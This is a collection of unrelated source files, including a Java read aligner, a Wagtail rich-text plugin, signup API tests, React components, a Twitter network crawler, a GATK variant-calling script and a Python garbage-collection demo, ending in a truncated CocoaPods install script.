static int MINCHROM=1;
static int MAXCHROM=Integer.MAX_VALUE;
static final boolean SUBSUME_SAME_START_SITES=true; //Not recommended if slow alignment is disabled.
static final boolean SUBSUME_SAME_STOP_SITES=true; //Not recommended if slow alignment is disabled.
/**
* True: Slightly slower.<br>
* False: Faster, but may mask detection of some ambiguously mapping reads.
*/
static final boolean LIMIT_SUBSUMPTION_LENGTH_TO_2X=true;
/** Not recommended if slow alignment is disabled. Can conceal sites that should be marked as amiguous. */
static final boolean SUBSUME_OVERLAPPING_SITES=false;
static final boolean SHRINK_BEFORE_WALK=true;
/** More accurate but uses chromosome arrays while mapping */
static final boolean USE_EXTENDED_SCORE=true; //Calculate score more slowly by extending keys
/** Even more accurate but even slower than normal extended score calculation.
* Scores are compatible with slow-aligned scores. */
static final boolean USE_AFFINE_SCORE=true && USE_EXTENDED_SCORE; //Calculate score even more slowly
public static final boolean RETAIN_BEST_SCORES=true;
public static final boolean RETAIN_BEST_QCUTOFF=true;
public static boolean QUIT_AFTER_TWO_PERFECTS=true;
static final boolean DYNAMICALLY_TRIM_LOW_SCORES=true;
static final boolean REMOVE_CLUMPY=true; //Remove keys like AAAAAA or GCGCGC that self-overlap and thus occur in clumps
/** If no hits are found, search again with slower parameters (less of genome excluded) */
static final boolean DOUBLE_SEARCH_NO_HIT=false;
/** Only this fraction of the originally removed genome fraction (FRACTION_GENOME_TO_EXCLUDE)
* is removed for the second pass */
static final float DOUBLE_SEARCH_THRESH_MULT=0.25f; //Must be less than 1.
static boolean PERFECTMODE=false;
static boolean SEMIPERFECTMODE=false;
static boolean REMOVE_FREQUENT_GENOME_FRACTION=true;//Default true; false is more accurate
static boolean TRIM_BY_GREEDY=true;//default: true
/** Ignore longest site list(s) when doing a slow walk. */
static final boolean TRIM_LONG_HIT_LISTS=false; //Increases speed with tiny loss of accuracy. Default: true for clean or synthetic, false for noisy real data
public static int MIN_APPROX_HITS_TO_KEEP=1; //Default 2 for skimmer, 1 otherwise, min 1; lower is more accurate
public static final boolean TRIM_BY_TOTAL_SITE_COUNT=false; //default: false
/** Length histogram index of maximum average hit list length to use.
* The max number of sites to search is calculated by (#keys)*(lengthHistogram[chrom][MAX_AVERAGE_SITES_TO_SEARCH]).
* Then, while the actual number of sites exceeds this, the longest hit list should be removed.
*/
static int MAX_USABLE_LENGTH=Integer.MAX_VALUE;
static int MAX_USABLE_LENGTH2=Integer.MAX_VALUE;
public static void clear(){
index=null;
lengthHistogram=null;
COUNTS=null;
}
static Block[] index;
static int[] lengthHistogram=null;
static int[] COUNTS=null;
final int KEYLEN; //default 12, suggested 10 ~ 13, max 15; bigger is faster but uses more RAM
final int KEYSPACE;
/** Site must have at least this many contiguous matches */
final int KFILTER;
final MSA msa;
final int BASE_KEY_HIT_SCORE;
boolean verbose=false;
static boolean verbose2=false;
static boolean SLOW=false;
static boolean VSLOW=false;
static int NUM_CHROM_BITS=3;
static int CHROMS_PER_BLOCK=(1<<(NUM_CHROM_BITS));
static final int MINGAP=Shared.MINGAP;
static final int MINGAP2=(MINGAP+128); //Depends on read length...
static boolean USE_CAMELWALK=false;
static final boolean ADD_LIST_SIZE_BONUS=false;
static final byte[] LIST_SIZE_BONUS=new byte[100];
public static boolean GENERATE_KEY_SCORES_FROM_QUALITY=true; //True: Much faster and more accurate.
public static boolean GENERATE_BASE_SCORES_FROM_QUALITY=true; //True: Faster, and at least as accurate.
static final int calcListSizeBonus(int[] array){
if(array==null || array.length>LIST_SIZE_BONUS.length-1){return 0;}
return LIST_SIZE_BONUS[array.length];
}
static final int calcListSizeBonus(int size){
if(size>LIST_SIZE_BONUS.length-1){return 0;}
return LIST_SIZE_BONUS[size];
}
static{
final int len=LIST_SIZE_BONUS.length;
// for(int i=1; i<len; i++){
// int x=(int)((len/(Math.sqrt(i)))/5)-1;
// LIST_SIZE_BONUS[i]=(byte)(x/2);
// }
LIST_SIZE_BONUS[0]=3;
LIST_SIZE_BONUS[1]=2;
LIST_SIZE_BONUS[2]=1;
LIST_SIZE_BONUS[len-1]=0;
// System.err.println(Arrays.toString(LIST_SIZE_BONUS));
}
}
|
<filename>chest/3rd-party/rrd4j/common/src/main/java/net/community/chest/rrd4j/common/jmx/MBeanDsDef.java
package net.community.chest.rrd4j.common.jmx;
import net.community.chest.jmx.dom.MBeanFeatureDescriptor;
import net.community.chest.rrd4j.common.core.DsDefExt;
import net.community.chest.util.datetime.TimeUnits;
import org.rrd4j.DsType;
import org.w3c.dom.Element;
/**
* <P>Copyright 2008 as per GPLv2</P>
*
* @author <NAME>.
* @since Jan 10, 2008 3:23:36 PM
*/
public class MBeanDsDef extends DsDefExt {
public MBeanDsDef (String dsName, DsType dsType, long heartbeat, double minValue, double maxValue)
{
super(dsName, dsType, heartbeat, minValue, maxValue);
}
public MBeanDsDef (String dsName, DsType dsType, TimeUnits htUnits, long htValue, double minValue, double maxValue)
{
super(dsName, dsType, htUnits, htValue, minValue, maxValue);
}
public MBeanDsDef (String dsName, DsType dsType, long heartbeat)
{
super(dsName, dsType, heartbeat);
}
public MBeanDsDef (String dsName, DsType dsType, TimeUnits htUnits, long htValue)
{
super(dsName, dsType, htUnits, htValue);
}
private String _attrName /* =null */;
public String getMBeanAttributeName ()
{
return _attrName;
}
public void setMBeanAttributeName (String name)
{
_attrName = name;
}
public String setMBeanAttributeName (Element elem) throws Exception
{
final String val=elem.getAttribute(MBeanFeatureDescriptor.NAME_ATTR);
if ((val != null) && (val.length() > 0))
setMBeanAttributeName(val);
return val;
}
public MBeanDsDef (Element elem) throws Exception
{
super(elem);
setMBeanAttributeName(elem);
}
}
|
<gh_stars>0
class P3
{
public static void main(String[] args)
{
int i=20;
while (i>=10)
{
if (i%2!=0)
{
System.out.println(i + " is a odd number");
}
i--;
}
}
}
|
import wagtail.admin.rich_text.editors.draftail.features as draftail_features
from django.conf import settings
from django.utils.html import format_html_join
from wagtail.core import hooks
from .rich_text import (
AnchorEntityElementHandler, AnchorIndentifierEntityElementHandler,
anchor_entity_decorator, anchor_identifier_entity_decorator
)
@hooks.register('register_rich_text_features')
def register_rich_text_anchor_feature(features):
features.default_features.append('anchor')
"""
Registering the `anchor` feature, which uses the `ANCHOR` Draft.js entity
type, and is stored as HTML with a `<a data-anchor href="#my-anchor">` tag.
"""
feature_name = 'anchor'
type_ = 'ANCHOR'
control = {
'type': type_,
'label': '#',
'description': 'Anchor Link',
}
features.register_editor_plugin(
'draftail', feature_name, draftail_features.EntityFeature(control)
)
features.register_converter_rule('contentstate', feature_name, {
# Note here that the conversion is more complicated than for blocks
# and inline styles.
'from_database_format': {
'a[data-anchor]': AnchorEntityElementHandler(type_)
},
'to_database_format': {
'entity_decorators': {type_: anchor_entity_decorator}
},
})
@hooks.register('insert_editor_js')
def insert_editor_js_anchor():
js_files = [
# We require this file here to make sure it is loaded before the other.
'wagtailadmin/js/draftail.js',
'kdl_wagtail_draftail/js/anchor.js',
]
js_includes = format_html_join(
'\n', '<script src="{0}{1}"></script>',
((settings.STATIC_URL, filename) for filename in js_files)
)
return js_includes
@hooks.register('register_rich_text_features')
def register_rich_text_anchor_identifier_feature(features):
features.default_features.append('anchor-identifier')
"""
Registering the `anchor-identifier` feature, which uses the
`ANCHOR-IDENTIFIER` Draft.js entity type, and is stored as HTML with a
`<a data-anchor href="#my-anchor" id="my-anchor">` tag.
"""
feature_name = 'anchor-identifier'
type_ = 'ANCHOR-IDENTIFIER'
control = {
'type': type_,
'label': '<#id>',
'description': 'Anchor Identifier',
}
features.register_editor_plugin(
'draftail', feature_name, draftail_features.EntityFeature(control)
)
features.register_converter_rule('contentstate', feature_name, {
# Note here that the conversion is more complicated than for blocks
# and inline styles.
# 'from_database_format': {
# 'a[data-id]': AnchorIndentifierEntityElementHandler(type_)
# }
'from_database_format': {
'a[data-id]': AnchorIndentifierEntityElementHandler(type_)
},
'to_database_format': {
'entity_decorators': {type_: anchor_identifier_entity_decorator}
},
})
|
<gh_stars>1-10
package com.illumina.basespace.property;
import java.util.ArrayList;
import java.util.List;
import com.illumina.basespace.entity.ApiResource;
import com.illumina.basespace.util.TypeHelper;
public abstract class ReferenceProperty<T extends ApiResource> extends Property<T>
{
public ReferenceProperty(String name,String description)
{
super(name,description);
}
public ReferenceProperty()
{
super();
}
public ReferenceProperty(String name, String description, T content)
{
super(name, description, content);
}
public ReferenceProperty(String name, String description, T[] items)
{
super(name, description, items);
}
public String[]getItemPaths()
{
List<String>paths = new ArrayList<String>();
if (getContent() != null)
{
paths.add(TypeHelper.INSTANCE.getResourcePath(getContent().getClass(), true) + "/" + getContent().getId());
}
else
{
for(T val:getItems())
{
paths.add(TypeHelper.INSTANCE.getResourcePath(val.getClass(), true) + "/" + val.getId());
}
}
return paths.toArray(new String[paths.size()]);
}
}
|
const supertest = require("supertest");
const app = require("../../../../server");
const database = require("../../../../server/database");
const cleanDatabase = require("../../../utils/cleanDatabase");
afterAll(() => cleanDatabase());
describe("POST /api/v1/auth/signup", () => {
it('should throw error "EMAIL_INVALID"', async () => {
const response = await supertest(app).post("/api/v1/auth/signup");
expect(response.headers["content-type"]).toContain("application/json");
expect(response.status).toBe(400);
expect(response.body.code).toBe("EMAIL_INVALID");
});
it('should throw error "PASSWORD_MISSING"', async () => {
const response = await supertest(app).post("/api/v1/auth/signup").send({
email: "<EMAIL>",
});
expect(response.headers["content-type"]).toContain("application/json");
expect(response.status).toBe(400);
expect(response.body.code).toBe("PASSWORD_MISSING");
});
it("should create new user", async () => {
const response = await supertest(app).post("/api/v1/auth/signup").send({
email: "<EMAIL>",
password: "password",
});
const user = response.body.user;
expect(response.status).toBe(201);
expect(user).toMatchObject({
name: null,
username: "user",
email: "<EMAIL>",
});
});
it("should not be allow to create account", async () => {
// set allowSignup to false in settings table
await database
.update({
allowSignup: false,
})
.from("settings");
const response = await supertest(app).post("/api/v1/auth/signup").send({
email: "<EMAIL>",
password: "password",
});
expect(response.status).toBe(400);
expect(response.body.code).toBe("SIGNUP_NOT_ALLOWED");
});
it("should not create new user with different casing in email", async () => {
await supertest(app).post("/api/v1/auth/signup").send({
email: "<EMAIL>",
password: "password"
});
const response = await supertest(app).post("/api/v1/auth/signup").send({
email: "<EMAIL>",
password: "password"
});
expect(response.headers["content-type"]).toContain("application/json");
expect(response.status).toBe(409);
expect(response.body.code).toBe("USER_EXISTS");
})
});
|
import React from "react";
import { Box, Code, Divider, Heading, Text } from "@chakra-ui/react";
const Comments = ({ comments = [] }) => {
return (
<>
<Heading size="md">Comments</Heading>
<div className="flex-row my-4">
{comments &&
comments.map((comment) => (
<div key={comment._id}>
<Box
borderWidth="1px"
borderRadius="lg"
overflow="hidden"
mt={3}
mb={2}
>
<Heading size="md">
{comment.commentAuthor} commented{" "}
<span style={{ fontSize: "0.825rem" }}>
on {comment.createdAt}
</span>
</Heading>
<Divider />
<Code mt={3}>{comment.commentText}</Code>
</Box>
</div>
))}
</div>
</>
);
};
export default Comments;
|
import React from 'react';
export default class ArrowDown extends React.Component {
render() {
const { width, height, color } = this.props;
return (
<svg width={width} height={height} viewBox="0 0 140 140" version="1.1" >
<g id="Icons" stroke="none" strokeWidth="1" fill="none" fillRule="evenodd">
<g transform="translate(-5144.000000, -591.000000)" fillRule="nonzero" id="icon_new_Inquiry">
<g transform="translate(5152.000000, 591.000000)">
<g id="Group" transform="translate(4.225455, 4.263636)" fill="url(#linearGradient-1)">
<rect id="矩形_562-2" x="0" y="0" width="111.927879" height="127.917576" rx="4"></rect>
</g>
<path d="M69.627072,113.744148 L69.627072,102.115663 C60.1951978,100.19039 53.7532786,91.4359298 54.7208147,81.85831 C55.6883508,72.2806902 63.7510088,64.9914902 73.377375,64.9914902 C83.0037413,64.9914902 91.0663993,72.2806902 92.0339354,81.85831 C93.0014715,91.4359298 86.5595523,100.19039 77.1276781,102.115663 L77.1276781,113.744148 C77.127678,115.815383 75.4486102,117.494451 73.377375,117.494451 C71.3061399,117.494451 69.6270721,115.815383 69.627072,113.744148 Z M62.126466,83.7417235 C62.126466,89.955429 67.1636695,94.9926326 73.377375,94.9926326 C79.5910806,94.9926326 84.6282841,89.955429 84.6282841,83.7417235 C84.6282841,77.528018 79.5910806,72.4908144 73.377375,72.4908144 C67.1665771,72.4978283 62.1334798,77.5309256 62.126466,83.7417235 Z" id="联合_2" fill="#FFFFFF" transform="translate(73.377375, 91.242970) rotate(-45.000000) translate(-73.377375, -91.242970) "></path>
</g>
</g>
</g>
</svg>
)
}
} |
db.createCollection('users')
db.users.insertOne({
firstName: 'John',
lastName: 'Smith',
age: 25,
email: 'john.smith@example.com'
})
db.users.insertOne({
firstName: 'Jane',
lastName: 'Doe',
age: 23,
email: 'jane.doe@example.com'
}) |
import java.util.concurrent.atomic.AtomicReferenceFieldUpdater;
public class NonAssignedFieldsTest {
static class Node<T> {
volatile Node<?> next;
static final AtomicReferenceFieldUpdater<Node,Node> nextUpdater =
AtomicReferenceFieldUpdater.newUpdater(Node.class, Node.class, "next");
}
{
Node<?> node = null;
Node<?> next = node.next;
}
}
|
/*
* Author: <NAME> (melo.cassio at gmail.com)
*/
package crawler;
import java.io.File;
import java.io.FileOutputStream;
import java.io.IOException;
import java.io.PrintStream;
import java.util.ArrayList;
import java.util.Collections;
import java.util.Comparator;
import java.util.HashMap;
import java.util.HashSet;
import java.util.Iterator;
import java.util.List;
import twitter.TwitterRetry;
import twitter4j.IDs;
import twitter4j.Paging;
import twitter4j.ResponseList;
import twitter4j.Status;
import twitter4j.TwitterException;
import twitter4j.User;
import twitter4j.auth.AccessToken;
// TODO: preserve network distribution: normalize number of nodes
// TODO: check "rateLimitStatus" at each twitter request
// TODO: discard re-tweet option
public class MultifocalCrawler {
public static final String[] FOCAL_NODES = {"manas", "sbisker", "jvaleski", "nicolecasanova"};
public static final int NUMBER_Link2S = 30;
public static final int NUMBER_NODES = 600;
public static final int NUMBER_STATUSES = 20;
public String networkOutputFile = "C:\\data\\twitter3.csv"; ///Users/cassiomelo/Dropbox/code/twittertest/data/twitter2.csv";
public String contentOutputFile = "C:\\data\\twitter3.txt";//"/Users/cassiomelo/Dropbox/code/twittertest/data/twitter2.txt";
TwitterRetry twitter;
public MultifocalCrawler(){
try {
twitter = TwitterRetry.getInstance();
AccessToken token = twitter.getOAuthAccessToken();
System.out.println("Access Token " +token );
} catch (Exception e) {
e.printStackTrace();
System.exit(1);
}
}
public HashSet<Long> getFriendsIDs(Long userId, int max) throws Exception {
HashSet<Long> ret = new HashSet<Long>();
long cursor = -1;
IDs ids;
int count = 0;
do {
ids = twitter.getFriendsIDs(userId, cursor);
for (int i = 0; i < ids.getIDs().length && i < max; i++) {
long id = ids.getIDs()[i];
ret.add(id);
}
count++;
} while ((cursor = ids.getNextCursor()) != 0 && count < max);
return ret;
}
public HashSet<User> getFriends(User u) throws Exception {
HashSet<User> ret = new HashSet<User>();
long cursor = -1;
IDs ids;
int count = 0;
do {
ids = twitter.getFriendsIDs(u.getScreenName(), cursor);
for (int i = 0; i < ids.getIDs().length; i++) {
long id = ids.getIDs()[i];
ret.add(twitter.showUser(id));
}
count++;
} while ((cursor = ids.getNextCursor()) != 0);
return ret;
}
public ArrayList<Long> getMostConnected(ArrayList<Long> users, int max) {
// Sort by userRank
Collections.sort(users, new Comparator<Long>() {
@Override
public int compare(Long o1, Long o2) {
return (getRankForUser(o1, userRank)).compareTo(getRankForUser(o2, userRank));
}
});
if (max <= users.size())
return (ArrayList<Long>) users.subList(0, max-1);
else return users;
}
public ArrayList<Long> getMostConnected(ArrayList<Long> users) {
// Sort by userRank
Collections.sort(users, new Comparator<Long>() {
@Override
public int compare(Long o1, Long o2) {
return (getRankForUser(o1, userRank)).compareTo(getRankForUser(o2, userRank));
}
});
int count = 0;
for (int i =0; i < users.size(); i++) {
Long userId = users.get(i);
if (getRankForUser(userId, userRank) <= 1) {
count++;
}
if (count >= 3) {// got 3 nodes with 1 connection, stop // this avoids a node connected with too many peripherical nodes
return (ArrayList<Long>) users.subList(0, i-1);
}
}
return users;
}
public Integer getRankForUser(Long userId, ArrayList<Object[]> userRank){
for (Object [] userCount : userRank) {
if ( (Long)userCount[0] == userId) return (Integer)userCount[1];
}
return 0;
}
ArrayList<Object[]> userRank;
public void crawl() throws TwitterException, IOException{
String[] startnodes = FOCAL_NODES;
ArrayList<Long> usersIds = new ArrayList<Long>();
HashMap<Long,HashSet<Long>> network = new HashMap<Long,HashSet<Long>>();
ArrayList<User> ret = new ArrayList<User>();
HashMap<User,HashSet<Link2>> Link2s = new HashMap<User,HashSet<Link2>>();
HashMap<User,ResponseList<Status>> statuses = new HashMap<User,ResponseList<Status>>();
ResponseList<User> users = twitter.lookupUsers(startnodes);
for (User u : users) {
usersIds.add(u.getId());
}
/*
* CRAWL NETWORK
*/
int maxFriends = 0;
int userIdx = 0;
while (usersIds.size() < NUMBER_NODES) {
Long curUserId = (Long) usersIds.get(userIdx);
try {
// save Link2s
HashSet<Long> friendsIds = this.getFriendsIDs(curUserId, NUMBER_Link2S); // this might throw an "unauthorized" exception that's why it should come first
network.put(curUserId, friendsIds);
usersIds.addAll(friendsIds);
} catch (Exception e) {
System.err.println(e.getMessage());
System.out.println("Error - not authorized for: "+curUserId + " - skipping...");
}
userIdx++;
}
// gather friends
for (int i = userIdx; i < usersIds.size(); i++) {
Long curUserId = (Long) usersIds.get(i);
try {
// save Link2s
HashSet<Long> friendsIds = this.getFriendsIDs(curUserId, NUMBER_Link2S); // this might throw an "unauthorized" exception that's why it should come first
network.put(curUserId, friendsIds);
} catch (Exception e) {
System.err.println(e.getMessage());
System.out.println("Error - not authorized for: "+curUserId + " - skipping...");
}
}
/*
* RANK USERS WITH THEIR NUMBER OF CONNECTIONS
*/
userRank = new ArrayList<Object[]>();
for(Long userId : network.keySet() ) {
int count = 0;
for(Long otherUserId : network.keySet() ) {
if (network.get(otherUserId).contains(userId)) // for each friendship with existing user, count++
count++;
}
Object[] usr = {userId, count};
userRank.add(usr);
}
// Sort userRank
Collections.sort(userRank, new Comparator<Object[]>() {
@Override
public int compare(Object[] arg0, Object[] arg1) {
return ((Integer) arg0[1]).compareTo((Integer)arg1[1]);
}
});
/*
* FILTER USERS
*/
for (Object[] userCount : userRank) {
Long curUserId = (Long) userCount[0];
User curUser = null;
try {
curUser = twitter.showUser(curUserId);
Link2s.put(curUser, new HashSet<Link2>());
} catch (Exception e) { // TODO remover user
System.err.println("ERROR: CARAI "+e.getMessage());
continue;
}
try {
ArrayList<Long> userFriendsIds = new ArrayList<Long>(
network.get(curUserId));
ResponseList<User> friends = twitter.lookupUsers(convertLongs(getMostConnected(userFriendsIds, 7)));
Iterator<User> it2 = friends.iterator();
while (it2.hasNext()) {
User friend = (User) it2.next();
Link2 l = new Link2(curUser, friend);
Link2s.get(curUser).add(l);
users.add(friend);
}
// successfully fetched user info, save user
ret.add(curUser);
// save statuses
Paging paging = new Paging(1, NUMBER_STATUSES);
ResponseList<Status> userStatuses = twitter.getUserTimeline(
curUser.getId(), paging);
statuses.put(curUser, userStatuses);
System.out.println("Done with: @" + curUser.getScreenName());
} catch (Exception e) {
//System.err.println(e.getMessage());
System.out.println("Error - not authorized for: "+curUser.getScreenName() + " - skipping...");
// remove Link2s to people that had "unauthorized access" exception
for (HashSet<Link2> Link2sPerUser : Link2s.values()) {
ArrayList<Link2> markedForRemoval = new ArrayList<Link2>();
for (Link2 curLink2 : Link2sPerUser) {
if (curLink2.from.getId() == curUser.getId() || curLink2.to.getId() == curUser.getId()) {
markedForRemoval.add(curLink2);
}
}
for (Link2 toRemoveLink2 : markedForRemoval) {
Link2sPerUser.remove(toRemoveLink2);
}
}
}
}
saveToCSVFile(ret, Link2s);
saveContentToFile(statuses);
}
/*
* Saves the network in NET format (Pajek)
* http://gephi.org/users/supported-graph-formats/pajek-net-format/
*/
public void saveToNetFile(ArrayList<User> users, HashMap<User,HashSet<Link2>> Link2s, HashMap<User,ResponseList<Status>> statuses) throws IOException{
FileOutputStream fout = new FileOutputStream(new File(networkOutputFile));
PrintStream ps = new PrintStream(fout);
String Link2sString = "*Edges\n";
ps.println("*Vertices "+users.size());
for (User user : users) {
ps.println(user.getId() + " \""+ user.getScreenName()+"\"");
if (Link2s.containsKey(user)) {
for(Link2 Link2 : Link2s.get(user)) {
Link2sString += Link2.toString() + "\n";
}
}
}
ps.println(Link2sString);
ps.close();
fout.close();
}
public void saveToCSVFile(ArrayList<User> users, HashMap<User,HashSet<Link2>> Link2s) throws IOException{
FileOutputStream fout = new FileOutputStream(new File(networkOutputFile));
PrintStream ps = new PrintStream(fout);
for (HashSet<Link2> Link2sPerUser : Link2s.values()) {
if (Link2sPerUser.size() > 0) {
ps.print(Link2sPerUser.iterator().next().from.getScreenName() + ";");
for (Link2 curLink2 : Link2sPerUser) {
ps.print(curLink2.to.getScreenName() + ";");
}
ps.print("\n");
}
}
ps.close();
fout.close();
}
public void saveContentToFile(HashMap<User,ResponseList<Status>> statuses) throws IOException{
FileOutputStream fout = new FileOutputStream(new File(contentOutputFile));
PrintStream ps = new PrintStream(fout);
for (ResponseList<Status> statusesPerUser : statuses.values()) {
if (statusesPerUser.size() > 0) {
ps.println(Constants.IDENTIFIER +statusesPerUser.iterator().next().getUser().getScreenName() + Constants.IDENTIFIER +statusesPerUser.size());
for (Status curStatus : statusesPerUser) {
ps.println(Constants.IDENTIFIER +curStatus.getId()+ Constants.IDENTIFIER+ curStatus.isRetweet()+ Constants.IDENTIFIER+
curStatus.getCreatedAt().getTime()+ Constants.IDENTIFIER+
curStatus.getText().replace("\n", "") + ""); // very important: replace line breaks
}
}
}
ps.close();
fout.close();
}
public static void main(String[] args) {
try {
MultifocalCrawler cn = new MultifocalCrawler();
cn.crawl();
} catch (TwitterException te) {
te.printStackTrace();
System.out.println("Failed to lookup users: " + te.getMessage());
System.exit(-1);
} catch (Exception e) {
e.printStackTrace();
}
}
private long[] convertLongs(List<Long> integers)
{
long[] ret = new long[integers.size()];
for (int i=0; i < ret.length; i++)
{
ret[i] = integers.get(i).longValue();
}
return ret;
}
class Link2{
public User from;
public User to;
public Link2(User f, User t) {
from = f;
to = t;
}
@Override
public boolean equals(Object obj) {
if (obj == this) {
return true;
}
if (obj == null || !(this.getClass() != obj.getClass())) {
return false;
}
Link2 other = (Link2)obj;
return
this.from.getId() == other.from.getId() &&
this.to.getId() == other.to.getId();
}
@Override
public int hashCode() {
return String.valueOf(this.from.getId()).hashCode() + String.valueOf(this.to.getId()).hashCode();
}
@Override
public String toString() {
return String.valueOf(this.from.getId()) + " " + String.valueOf(this.to.getId());
}
}
}
|
#!/bin/bash
set -e
set -o pipefail
umask 0002
DATA_DIR=/srv/kenlab/celine/master_thesis/data/vcf_files/joint_genotyping/A_vcf_350/vcf_compressed
SCRATCH_DIR=~/script_dir/runtime_scripts/joint_parallel_10samples/scratch_GATKv4_jointgenotype_sa0012
echo "Job runs on `hostname`"
echo "at $SCRATCH_DIR"
mkdir $SCRATCH_DIR || exit 1
source /usr/local/ngseq/etc/lmod_profile
module add Variants/GATK/4.1.2.0 Tools/Picard/2.18.0
gunzip -c $DATA_DIR/sa0012/1.g.vcf.gz > $SCRATCH_DIR/1.g.vcf
gunzip -c $DATA_DIR/sa0012/2.g.vcf.gz > $SCRATCH_DIR/2.g.vcf
gunzip -c $DATA_DIR/sa0012/3.g.vcf.gz > $SCRATCH_DIR/3.g.vcf
gunzip -c $DATA_DIR/sa0012/4.g.vcf.gz > $SCRATCH_DIR/4.g.vcf
gunzip -c $DATA_DIR/sa0012/5.g.vcf.gz > $SCRATCH_DIR/5.g.vcf
gunzip -c $DATA_DIR/sa0012/6.g.vcf.gz > $SCRATCH_DIR/6.g.vcf
gunzip -c $DATA_DIR/sa0012/7.g.vcf.gz > $SCRATCH_DIR/7.g.vcf
gunzip -c $DATA_DIR/sa0012/8.g.vcf.gz > $SCRATCH_DIR/8.g.vcf
gunzip -c $DATA_DIR/sa0012/9.g.vcf.gz > $SCRATCH_DIR/9.g.vcf
gunzip -c $DATA_DIR/sa0012/10.g.vcf.gz > $SCRATCH_DIR/10.g.vcf
cd $SCRATCH_DIR || exit 1
gatk --java-options "-Xmx10G" CombineGVCFs -R /srv/GT/reference/Finger_millet/KEN/DENOVO_v2.0_A_subgenome/Sequence/WholeGenomeFasta/genome.fa -V 1.g.vcf -V 2.g.vcf -V 3.g.vcf -V 4.g.vcf -V 5.g.vcf -V 6.g.vcf -V 7.g.vcf -V 8.g.vcf -V 9.g.vcf -V 10.g.vcf -O GATKv4_Genotyping.g.vcf
rm -r {1..10}.g.vcf
gatk --java-options "-Xmx10G" GenotypeGVCFs -R /srv/GT/reference/Finger_millet/KEN/DENOVO_v2.0_A_subgenome/Sequence/WholeGenomeFasta/genome.fa -V GATKv4_Genotyping.g.vcf -O GATKv4_Genotyping.raw.vcf
gatk --java-options "-Xmx10G" SelectVariants -R /srv/GT/reference/Finger_millet/KEN/DENOVO_v2.0_A_subgenome/Sequence/WholeGenomeFasta/genome.fa -V GATKv4_Genotyping.raw.vcf -O GATKv4_Genotyping.raw.snp.vcf -select-type SNP
gatk --java-options "-Xmx10G" VariantFiltration -R /srv/GT/reference/Finger_millet/KEN/DENOVO_v2.0_A_subgenome/Sequence/WholeGenomeFasta/genome.fa -V GATKv4_Genotyping.raw.snp.vcf --filter-expression "! vc.hasAttribute('QD') || QD < 2.0" --filter-name "QD" --filter-expression "vc.isSNP() && (MQ < 30.0 || (vc.hasAttribute('MQRankSum') && MQRankSum < -15.0))" --filter-name "MQ" --genotype-filter-expression "GQ < 20 || DP == 0" --genotype-filter-name "GQ" -O GATKv4_Genotyping.filtered.vcf
mv GATKv4_Genotyping.raw.snp.vcf GATKv4_Genotyping.raw.vcf
gzip GATKv4_Genotyping.raw.vcf
gzip GATKv4_Genotyping.filtered.vcf
|
#!/usr/bin/env python
# encoding: utf-8
#
# Copyright (c) 2010 <NAME>. All rights reserved.
#
"""Show the objects with references to a given object.
"""
#end_pymotw_header
import gc
flags = (gc.DEBUG_COLLECTABLE |
gc.DEBUG_UNCOLLECTABLE |
gc.DEBUG_OBJECTS |
gc.DEBUG_SAVEALL
)
gc.set_debug(flags)
class Graph(object):
def __init__(self, name):
self.name = name
self.next = None
def set_next(self, next):
self.next = next
def __repr__(self):
return '%s(%s)' % (self.__class__.__name__, self.name)
class CleanupGraph(Graph):
def __del__(self):
print '%s.__del__()' % self
# Construct a graph cycle
one = Graph('one')
two = Graph('two')
one.set_next(two)
two.set_next(one)
# Construct another node that stands on its own
three = CleanupGraph('three')
# Construct a graph cycle with a finalizer
four = CleanupGraph('four')
five = CleanupGraph('five')
four.set_next(five)
five.set_next(four)
# Remove references to the graph nodes in this module's namespace
one = two = three = four = five = None
# Force a sweep
print 'Collecting'
gc.collect()
print 'Done'
# Report on what was left
for o in gc.garbage:
if isinstance(o, Graph):
print 'Retained: %s 0x%x' % (o, id(o))
|
<gh_stars>1-10
//
// Block.cpp
// SampleGame
//
// Created by <NAME> on 1/26/17.
// Edited by <NAME> on 03/08/2017
// Copyright © 2017 De Anza College Developers' Guild. All rights reserved.
//
#include "Block.h"
/*default constructor
*sets all values to zero and color black
*/
Block::Block(){
_xPos = 0;
_yPos = 0;
_xyPosition = sf::Vector2f(0, 0);
_width = 0;
/*
_image.setSize(Vector2f(_width, _width));
_image.setPosition(_xPos, _yPos);
_image.setFillColor(_color);
*/
}
/*custom constructor
*@param: color of the block
*@param: x position of the block
*@param: width of the block
*@param: bool, wither the block can be walked on
*/
Block::Block(sf::Texture* texture, float x, float y, int wid, bool passable) {
_xPos = x;
_yPos = y;
_xyPosition = sf::Vector2f(x, y);
_width = wid;
_texture = texture;
_passable = passable;
_sprite = new sf::Sprite(*texture);
_sprite->setPosition(x, y);
}
|
import React, { useState } from 'react';
import {
View,
FlatList,
TextInput,
TouchableOpacity,
Button
} from 'react-native';
const App = () => {
const [contacts, setContacts] = useState([]);
const [name, setName] = useState('');
const [editing, setEditing] = useState(false);
const [editingIndex, setEditingIndex] = useState(null);
const handleAddContact = () => {
const newContacts = [...contacts, { name }];
setContacts(newContacts);
setName('');
};
const handleEditContact = (index) => { const newName = contacts[index].name; setName(newName); setEditing(true); setEditingIndex(index);
};
const handleUpdateContact = () => {
const newContacts = [...contacts];
newContacts[editingIndex].name = name;
setContacts(newContacts);
setName('');
setEditing(false);
};
const handleDeleteContact = (index) => {
const newContacts = [...contacts];
newContacts.splice(index, 1);
setContacts(newContacts);
};
return (
<View>
<TextInput value={name} onChangeText={setName} />
{editing ? (
<Button title="Update Contact" onPress={handleUpdateContact} />
) : (
<Button title="Add Contact" onPress={handleAddContact} />
)}
<FlatList
data={contacts}
renderItem={({ item, index }) => (
<View>
<Text>{item.name}</Text>
<Button title="Edit Contact" onPress={() => handleEditContact(index)} />
<Button
title="Delete Contact"
onPress={() => handleDeleteContact(index)}
/>
</View>
)}
keyExtractor={(_, index) => `${index}`}
/>
</View>
);
};
export default App; |
#!/bin/sh
set -e
echo "mkdir -p ${CONFIGURATION_BUILD_DIR}/${FRAMEWORKS_FOLDER_PATH}"
mkdir -p "${CONFIGURATION_BUILD_DIR}/${FRAMEWORKS_FOLDER_PATH}"
SWIFT_STDLIB_PATH="${DT_TOOLCHAIN_DIR}/usr/lib/swift/${PLATFORM_NAME}"
install_framework()
{
if [ -r "${BUILT_PRODUCTS_DIR}/$1" ]; then
local source="${BUILT_PRODUCTS_DIR}/$1"
elif [ -r "${BUILT_PRODUCTS_DIR}/$(basename "$1")" ]; then
local source="${BUILT_PRODUCTS_DIR}/$(basename "$1")"
elif [ -r "$1" ]; then
local source="$1"
fi
local destination="${CONFIGURATION_BUILD_DIR}/${FRAMEWORKS_FOLDER_PATH}"
if [ -L "${source}" ]; then
